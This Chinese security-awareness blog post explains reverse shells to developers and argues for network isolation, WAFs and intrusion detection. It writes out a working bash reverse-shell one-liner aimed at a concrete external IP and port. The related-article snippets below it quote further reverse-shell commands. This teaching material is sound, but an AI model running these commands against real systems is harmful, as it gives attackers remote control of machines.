大家一起学安全之反弹shell

最新推荐文章于 2023-03-24 23:57:39 发布
最新推荐文章于 2023-03-24 23:57:39 发布
阅读量349 收藏
点赞数
文章标签: 安全 安全漏洞 数据安全 shell web service
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzouri/article/details/105966669
版权

最近在工作中发现,一线研发类的同学对基本的安全的知识缺乏必要的了解,进而产生出这样的一些想法(纯属想象。。。):
在这里插入图片描述

  1. 你看我的密码zhangsan!@#123, 密码字母,数字,特殊字符都有了,别人肯定猜不到…
  2. 天啊,密码要三个月必须改一次,是不是吃饱了没事干…
  3. 安全又搞事情了,这也不能访问,那也需要认证,心里默默飘过了一万个草泥马…
  4. 每次访问数据库,流程一大堆,我自己写个PHP后门挂上去,可以随时访问,方便多了…
  5. 数据都加密了,我还怎么愉快的抓包定位问题? 又是一万个草泥马…
  6. 这台机器反正外网访问不到,我可以为所欲为了,各种软件装起来…
  7. 这个工程的代码写的太优雅了,感觉也不太重要,放我自己github上吧…
  8. 卧槽,安全的产品这么贵,还就这么点功能,好像也用不着,能省就省点吧…
  9. 公司这几个安全人员平时看着事也不多,这次裁员要不就先拿他们开刀…

“未知攻,焉知防”, 后续准备通过一系列小的分享文章,以此来增强大家在安全方面的基本认知和日常工作中的安全意识,今天我们就从反弹shell说起。

什么是反弹shell

怎么获取到shell呢?比如,我们通过ssh访问机房的一台服务器(chicken),然后有一个shell命令行的方式来操作这台服务器,那么就可以说我们拿到了chicken的shell。除了ssh之外,我们还可以通过telnet,vnc来达到一个远程登陆的效果。

透过现象看本质,Hacker想要控制chicken,二者之间必须有一个数据传输的通道(TCP/UDP)。ssh是chicken启动一个ssh Server,Hacker来连接。当然,我们也可以开发一个叫TMD Server服务,可以将hacker发上来的文本当做一个CMD执行,那么也就认为TMDServer具备远程登陆的功能。

总而言之,上述shell通道的建立,都是hacker主动连接chicken,那么如果chicken主要连接hacker实现的shell执行通道,就叫反弹shell
在这里插入图片描述

为什么要反弹shell

为什么要用反弹shell呢,简单来说就是正向不好搞,所以要反向搞。比如,hacker通过九牛二虎之力,在chicken上上传了一个小马。后面的情况可能是:
chichen在局域网中,没有外网地址,我连不上;
chicken有外网地址,但是经常变,我不能持续的控制它;
chicken前面有waf部署,对进来的request请求做了过滤,很难绕过;
那么我可以通过在hacker机器上启动一个tcpserver,让chicken主动来连接我,由此建立一个数据通道来执行shell。
在这里插入图片描述
借用一图说明下(侵删)

示例

ttygif ttyrecord
hacker(外网地址为39.98.87.76)上执行:
在这里插入图片描述

chicken行执行
在这里插入图片描述

然后此时在看hacker机器上的显示,已经成功拿到chicken的shell,可以在chicken上为所欲为了。
在这里插入图片描述

先详细解释下chicken上执行命令的含义,这条命令就可以叫做一条反弹shell。现在详细解释下这条命令的含义:

bash -i >& /dev/tcp/39.98.87.76/4100 0>&1
bash -i 表示启动一个交互式的shell;
>& 这个交互式shell的标准输出和标准错误输出,重定向到这socket上/dev/tcp/39.98.87.76/4100,也即发送到/dev/tcp/39.98.87.76/4100远端;
0>&1 标准输入重定向到标准输出上;

简而言之,就是启动一个交互式shell,这个交互式shell的输入来自hacker,输出也输出也到hacker上。
在这里插入图片描述

反弹shell的姿势

通过bash -i的是最简单的但也同时是最容易被识别的反弹shell,在没有任何防护的小chicken上执行是没有问题的。

但如果此时chicken有一定的防护能力,比如前面有个waf或者机器装有入侵检测系统,容易就被识别出来被拦截。

但对于一个有经验的hacker来讲,熟练运用各种撩人姿势是必备技能,举例说明:
在这里插入图片描述

尤其msf自动生成的一些webshell,即便是装配了一些大厂的入侵检测系统,也很难直接识别出来。

后续操作

chicken被拿到shell后,那么就可以通过chicken来探测跟它在同一网段上的其他机器,他们都部署了什么服务,这些服务是否存在已知的可利用的漏洞等等。或者种上点蠕虫病毒,让其在内网中传播,一只小chicken被感染了,一群chicken可能都会被攻陷下来。

总结

由此分析,我觉得至少改变几个初级的安全认知:
内网的机器并不绝对安全的,一样可以被拿到shell。
做网络隔离,哪怕是内网中的网络安全域,是有用的,不是闲的没事干的操作。
waf和入侵检测能够较大的提升攻击门槛。

欢迎关注公众号【玩物得志技术】更多干货分享
在这里插入图片描述

zzouri
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全-反弹shell详解(攻击,检测与防御)
关注网络安全、云原生安全
09-21 5675
简介 如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。 原理 反弹shell bash php python nc telnet perl 参考 ​​​​​​基于主机的反弹shell检测思路 - 哔哩哔哩 常用的反弹shell总结_西部壮仔的博客-CSDN博客_反弹shell能干嘛 ...
关于反弹shell【总结相关技术、细节易错点、问题等】
我这不是依托答辩随你怎么说
02-18 304
关于反弹shell(总结相关技术、细节易错点、问题等),shell中的>&和&>以及ncat中的用法区别。
webshell反弹shell的区别与防御
redwand的博客
05-11 6300
对linux服务器的渗透测试过程中,我们在getshell得到一个低权限的webshell后,由于webshell是非交互式shell,通常要反弹一个交互式的shell,然后进一步进行提权。那么,什么是交互式shell和非交互式shell呢,他们又是如何与靶机进行通信的呢?相信网络上的文章大家也看到很多,今天我们不说理论,先以一个抓包实验来验证一下。
入侵检测——如何实现反弹shell检测?
qq_42009262的博客
03-24 2365
如何实现反弹shell检测?
Linux反弹shell姿势汇总
isxiaole的博客
08-10 592
1、netcat反弹shell 目前,默认的各个linux发行版本已经自带了netcat工具包,但是可能由于处于安全考虑原生版本的netcat带有可以直接发布与反弹本地shell的功能参数 -e 都被阉割了,所以我们需要自己手动下载二进制安装包,安装的如下: wget https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz tar -xvzf netcat-0.7.1.tar.gz ./configure
一起Shell脚本
01-07
什么是shell脚本?   脚本最初是从演艺界中的一个词,指表演戏剧、拍摄电影等所依据的底本或者书稿的底本。后来,IT行业引用了这个词,我们现在所说的脚本(script)是使用一种特定的描述性语言,依据一定的格式编写...
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
浅析Linux之bash反弹shell原理
01-08
反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口...
红队隧道加密之OpenSSL加密反弹Shell(一)
xf555er的博客
11-26 965
OpenSSL是一个开源的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上其主要库是以C语言所写成,实现了基本的加密功能,实现了SSL与TLS协议。OpenSSL 可以运行在OpenVMS、 Microsoft Windows以及绝大多数类Unix操作系统上(包括Solaris,Linux,Mac OS X与各种版本的开放源代码BSD操作系统)。它也提供了一个移植版本,可以在IBM i(OS/400)上运作。
渗透测试之反弹shell
Sulli的博客
03-16 497
什么是反弹shell 攻击者想要控制肉鸡,就必须要一个数据传输的通道(TCP/UDP),可以通过ssh或telnet来远程登录来进行操作。这些都是攻击者主动连接肉鸡,如果肉鸡主动连接攻击者实现的shell通道,,就叫反弹shell。 为什么要反弹shell 因为正面不好搞,所以需要反向搞。比如攻击者在肉鸡上上传了一个小马,可能会出现的情况有: 1.肉鸡在局域网内,没有外网地址,连不上。 2.肉鸡有...
CVE-2019-0708——反弹shell
迷风小白
09-09 1万+
0x00 前言 CVE-2019-0708这个漏洞最早爆出是在今年5月份,不过当时这个漏洞POC只能使得目标主机蓝屏,相关文章可以参考我的前一篇文章,然而就在前几天又爆出来可以反弹shell的exp,下面我就又双叒叕来复现一下啦。 目前漏洞影响范围:Windows 7 sp1 or 2008 R2 0x01 环境准备 镜像:Windows 7 sp1 (链接: https://pan.baidu....
安全技术系列之反弹Shell
好记性不如烂笔头
03-13 2279
常用反弹shell技术汇总
waf过滤了危险字符串_Web应用程序防火墙(WAF)bypass技术讨论(二)
weixin_39603537的博客
12-06 355
Web应用程序防火墙(WAF)bypass技术的第一部分中,我们已经看到了如何使用通配符(主要是使用问号通配符)绕过WAF规则。显然,还有很多其他方法可以绕过WAF规则集,我认为每次攻击都有其特定的规避技术。例如:在SQL注入的payload内使用注释语法可以绕过许多过滤器。也就是说,不使用union+select,而是使用 /?id=1+un/**/ion+sel/**/ect+1,...
渗透测试习25:反弹shell
weixin_44315099的博客
03-22 370
目录简述linux下文件描述符和重定向文件描述符重定向输入重定向:` [n]< word `输出重定向:`[n]> word`标准输出与标准错误输出重定向:`&> word`文件描述符的复制Linux 反弹shell原理常用linux下反弹shellwindows下反弹shell总结 简述 反弹shell就是: 就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上
[网络安全篇] 五十八.Windows安全缺陷利用之再看CVE-2019-0708及反弹shell防御措施
热门推荐
杨秀璋的专栏
03-12 1万+
很早之前,我分享过一篇名叫 “Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解” 的博客,主要采用Python代码让目标XP系统蓝屏,但写得不太完善。作者最近一直在习Windows漏洞利用,包括Msfconsole渗透工具及shell获取,这里我们也回过头来继续分析CVE-2019-0708,利用RDP(EXP)和Metasploit工具反弹shell,并实现Win7远程桌面攻击。希望文章对您有所帮助~
反弹shell的多种方式
课嗨教育的专栏
04-03 315
升级成半交互式 tty python -c 'import pty; pty.spawn("/bin/bash")' 升级成完全交互式 tty,能用方向键 + tab,就是退出比较麻烦。 python -c 'import pty; pty.spawn("/bin/bash")' Ctrl + Z stty raw -echo fg reset Bash Tested on Ubuntu 10.10 /bin/bash -i >& /dev/tcp/10.10.14.1/44
python反弹shell_反弹shell的几种方式总结
weixin_34653651的博客
01-15 4115
假设本机地址10.10.10.11,监听端口443。1、Bash环境下反弹TCP协议shell首先在本地监听TCP协议443端口nc-lvp443然后在靶机上执行如下命令:bash-i>&/dev/tcp/10.10.10.11/4430>&1/bin/bash-i>/dev/tcp/10.10.10.11/4430&1exec5&l...
反弹shell汇总,看我一篇就够了
LainWith的博客
12-26 8632
反弹shell 知识铺垫 什么是shell shell是渗透中常用的名词,像getshellwebshell反弹shell等等,都和shell相关。 getshell:获取到目标的命令执行权限 webshell:指网站后门,通过web服务进行命令执行 反弹shell:把命令行的输入输出转移到其它主机 Shell 俗称壳(用来区别于核),是指“为使用者提供操作界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序。简单说用户通
网络安全pcntl_exec反弹shell
最新发布
09-23
反弹Shell是一种网络攻击技术,它通过将受感染的计算机与攻击者的计算机建立起连接,并使攻击者能够在远程执行命令。在网络安全中,pcntl_exec是PHP的一个函数,它可以用于在服务器上执行外部命令。攻击者可能会利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值